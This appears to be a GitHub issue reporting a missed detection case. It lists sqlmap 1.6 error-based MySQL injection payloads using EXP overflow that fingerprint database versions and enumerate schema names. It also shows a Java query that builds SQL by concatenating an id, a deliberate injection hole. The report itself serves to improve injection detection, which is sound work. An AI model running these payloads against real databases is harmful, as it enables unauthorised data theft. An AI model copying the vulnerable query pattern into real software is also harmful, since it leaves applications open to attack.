Skip to content

a bad case #22

@k4n5ha0

Description

@k4n5ha0

sqlmap 1.6
payload:
EXP(~(SELECT * FROM (SELECT CONCAT(0x71707a6a71,(SELECT (CASE WHEN (5931=5931) THEN 1 ELSE 0 END)),0x716b7a7671,0x78))x))

java:
rset = stmt.executeQuery ("SELECT * FROM vuln WHERE id = " + id);

image

other payload:
EXP((SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT REPEAT(0x34,1024)),0x717a626a71,0x78))x))
EXP(
(SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT REPEAT(0x33,453)),0x717a626a71,0x78))x))
EXP((SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x717a626a71,0x78))x))
EXP(
(SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x717a626a71,0x78))x))
EXP((SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x717a626a71,0x78))x))
EXP(
(SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x717a626a71,0x78))x))
EXP((SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x717a626a71,0x78))x))
EXP(
(SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x717a626a71,0x78))x))
EXP((SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,453) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x717a626a71,0x78))x))
EXP(
(SELECT * FROM (SELECT CONCAT(0x7178707071,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,453) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x717a626a71,0x78))x))

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions